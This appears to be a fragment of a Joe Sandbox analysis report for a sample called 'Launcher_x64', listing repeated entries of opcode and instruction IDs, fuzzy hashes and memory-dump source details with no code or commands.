                                                                                                                                                                                                                                                                                        • Instruction ID: 8249dbe79435663dbc1fb59fae99bab8598ac9d7fe647922c150dd54caf7bf00
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bda4b375fcd006c169eac15fcd02c62b224c6f04cfe56def1b0a70d90047895
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB12A272A0C7118BC725DF18D8806ABB3E2BFC4315F19893ED586A7385D738B8118B87
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 4619cf223af8198b88be87ebf92622dc091b301b5c108c2c1874c49d52a6af1e
                                                                                                                                                                                                                                                                                        • Instruction ID: 5aa941da1f976eaeaa8b35b143c2842886abe6ff6a68546d006384ec7a1d2cee
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4619cf223af8198b88be87ebf92622dc091b301b5c108c2c1874c49d52a6af1e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1302EF71A0C3218BD724CF64D88076FB3E2EBD5304F04493DE9959B282EB759909CB9A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 279043dd8c5340cb0b6158fae8ffcb9100b2f6ecd3eb49fada46f4c036c50eae
                                                                                                                                                                                                                                                                                        • Instruction ID: 20ec464b07922d83c1775bf2789846d225831bb389f209247fbd487f8a225285
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 279043dd8c5340cb0b6158fae8ffcb9100b2f6ecd3eb49fada46f4c036c50eae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22B126746083004BD714EF25D88163BF7A2EBDE314F24A92EF58557392DB39EC06879A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: c0844557a0379c24c8fc1471b41180fc22d546779764b41d269fbe12e5f72335
                                                                                                                                                                                                                                                                                        • Instruction ID: 48d9341909362addc4c675d4786467c80c427c9684c637eefa89a90fde3abb45
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0844557a0379c24c8fc1471b41180fc22d546779764b41d269fbe12e5f72335
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40F1D2356087418FD724CF29C88066BFBE2EFD9304F08882EE5D597791E679E904CB96
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 3a285db9e8c7edcc63df9c36047d998941caa7c2c3dacc23210bf07a432b5b1a
                                                                                                                                                                                                                                                                                        • Instruction ID: 8cbf46bb28bf406465367b4de668a31a4b3cdd868a891f7ea0dd3351814c3364
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a285db9e8c7edcc63df9c36047d998941caa7c2c3dacc23210bf07a432b5b1a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EAB14772B043209BC720DF249D82A7BB3A1EF91324F49852DE99597381E37DEC05C39A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 97e009e0315436a1731f6a03ee0a9a8bb827ae520f5b4c9fe0da27906fdad42e
                                                                                                                                                                                                                                                                                        • Instruction ID: f624fb7d0d2682eb8e2514ea54b8b79b30e071573567d18a4e3a07cdb7883179
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97e009e0315436a1731f6a03ee0a9a8bb827ae520f5b4c9fe0da27906fdad42e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92D1D37B628252CBCB185F78D8A227A73F1FF4A741F0A847DD882872A0E7388955C755
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 583f48ddf441637194c61a4853c86379af0676fd195e760495eeff77e693d592
                                                                                                                                                                                                                                                                                        • Instruction ID: 79a3a22eacaa49d51bc6397fda91b65e3fab8852545732a8213c30960ce9295d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 583f48ddf441637194c61a4853c86379af0676fd195e760495eeff77e693d592
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99517836A442104BC728CE38D89166BB7D2EBC9324F19963ED8E9C33A1D6389C01C796
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: f82463bf35f6f81a6a70b41c88b031b5ff54ece0df9a954b069454a2c0903b1d
                                                                                                                                                                                                                                                                                        • Instruction ID: 3639d8a29d84ba5919e7626b029a28639efd1f0542b5bac8f4bc308327740377
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f82463bf35f6f81a6a70b41c88b031b5ff54ece0df9a954b069454a2c0903b1d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBF0E934A041485FEB089F75D8625FF7BB9DB4B750F14A03CE54263241D6349841C768
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 539ba414b7b2dcea4b8a545e00631e1ae21b96038eac56eada3ddf7038b56721
                                                                                                                                                                                                                                                                                        • Instruction ID: 30b24ba7414dd68909bbdf87bfec220448337b97d4f0e973103b6bfeea2960e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 539ba414b7b2dcea4b8a545e00631e1ae21b96038eac56eada3ddf7038b56721
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8C0123461B2809FE308CF24A8815A7B6335BD3505E2C553DC8C117217D1319515832E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 5428a3f4d637f55dd33f4135330e2b7b0f742cf5d4c0f005aa732dc7209f0901
                                                                                                                                                                                                                                                                                        • Instruction ID: 87e81ba0c8f565f686e9a9ee58845d92d04bc3974e695c2a1a6d995e921633fd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5428a3f4d637f55dd33f4135330e2b7b0f742cf5d4c0f005aa732dc7209f0901
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34C09239A48140DBC208CF18ECA1932E239A75BB0AF14383A9403F32A1C639D5119A0D